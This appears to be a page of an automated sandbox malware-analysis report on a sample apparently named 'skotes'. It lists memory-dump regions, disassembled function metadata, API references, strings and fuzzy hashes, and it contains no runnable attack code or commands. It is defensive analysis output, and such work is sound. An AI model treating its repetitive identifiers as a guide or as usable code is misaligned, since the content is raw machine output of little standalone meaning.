                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                                                                                                                • String ID:
                                                                                                                • API String ID: 1319684358-0
                                                                                                                • Opcode ID: e5aedeb3f7c7327285c97a9ad15948e1f4b73bd472c9971b832ee3f7103e8d8f
                                                                                                                • Instruction ID: 0886e1d7762c845cd543e62b19f2a131fa20ef8abe4bc7785c486924ed3db2a3
                                                                                                                • Opcode Fuzzy Hash: e5aedeb3f7c7327285c97a9ad15948e1f4b73bd472c9971b832ee3f7103e8d8f
                                                                                                                • Instruction Fuzzy Hash: 88317AB1B00215CBCF15DFA8E9456AEB7B5EF09310B64406EE845E7351DB38AE02CBA5
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16__freea
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 1635606685-768041998
                                                                                                                • Opcode ID: eea9bfef5938362d0eea88b12ab905dde7cce3a25bef382cb529da690246e054
                                                                                                                • Instruction ID: fa406436f8ae9d97cb45bf17b2e89717406878492d8f919ce84aed75d53d5f45
                                                                                                                • Opcode Fuzzy Hash: eea9bfef5938362d0eea88b12ab905dde7cce3a25bef382cb529da690246e054
                                                                                                                • Instruction Fuzzy Hash: 71819F72D00255ABDF20AE6488C5FEE7BF9AF49714F19815DE805B7281E73DDC408BA1
                                                                                                                APIs
                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 007B1B57
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007B1B66
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007B1C2A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                • String ID: pContext$switchState
                                                                                                                • API String ID: 2656283622-2660820399
                                                                                                                • Opcode ID: ba379d9ab34a1fdb8e25a2273c208d70e8c679f683714f655710a59afe1b070b
                                                                                                                • Instruction ID: 4c137fe10d566d4b734c2deede97e704a544766f0fdcc51e99dec3f703f6b642
                                                                                                                • Opcode Fuzzy Hash: ba379d9ab34a1fdb8e25a2273c208d70e8c679f683714f655710a59afe1b070b
                                                                                                                • Instruction Fuzzy Hash: 2631A675A00214DBCF05EF64C8A5BEE7775FF44310FA04565E91197341EB78EE11CA90
                                                                                                                APIs
                                                                                                                • FindSITargetTypeInstance.LIBVCRUNTIME ref: 007B4E6D
                                                                                                                • FindMITargetTypeInstance.LIBVCRUNTIME ref: 007B4E86
                                                                                                                • PMDtoOffset.LIBCMT ref: 007B4EAC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FindInstanceTargetType$Offset
                                                                                                                • String ID: Bad dynamic_cast!
                                                                                                                • API String ID: 1467055271-2956939130
                                                                                                                • Opcode ID: c6a6bbd64d43b0009f90385b77d647463a6897833b06ef89f48b6cbac80b40ea
                                                                                                                • Instruction ID: d63153f8e184c87217772d048e642a1a755ec7e19ac5f582c922cec4b0733a31
                                                                                                                • Opcode Fuzzy Hash: c6a6bbd64d43b0009f90385b77d647463a6897833b06ef89f48b6cbac80b40ea
                                                                                                                • Instruction Fuzzy Hash: 3121A7B2A04205EFCF14DE68DD4AFEA77B8FB44724B148519F91197282DB39ED0096A1
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 531285432-768041998
                                                                                                                • Opcode ID: 8ecdf41991ada2f69b570c74f77b9a10266491e9c3e45c85a1393350eadb7cda
                                                                                                                • Instruction ID: 0353687fc318050c3c4c9c49816dd2f58225c7543bd1bafa4354c0ae6a7fb851
                                                                                                                • Opcode Fuzzy Hash: 8ecdf41991ada2f69b570c74f77b9a10266491e9c3e45c85a1393350eadb7cda
                                                                                                                • Instruction Fuzzy Hash: F1213272A01119EFDF01EFA4ED859BEB7B9EF09710F104015F501B7291DB38AD019BA0
                                                                                                                APIs
                                                                                                                • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 007AA069
                                                                                                                  • Part of subcall function 007AB560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 007AB5AF
                                                                                                                • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 007AA07F
                                                                                                                • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 007AA0CB
                                                                                                                  • Part of subcall function 007AAB41: List.LIBCONCRT ref: 007AAB77
                                                                                                                • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 007AA0DB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
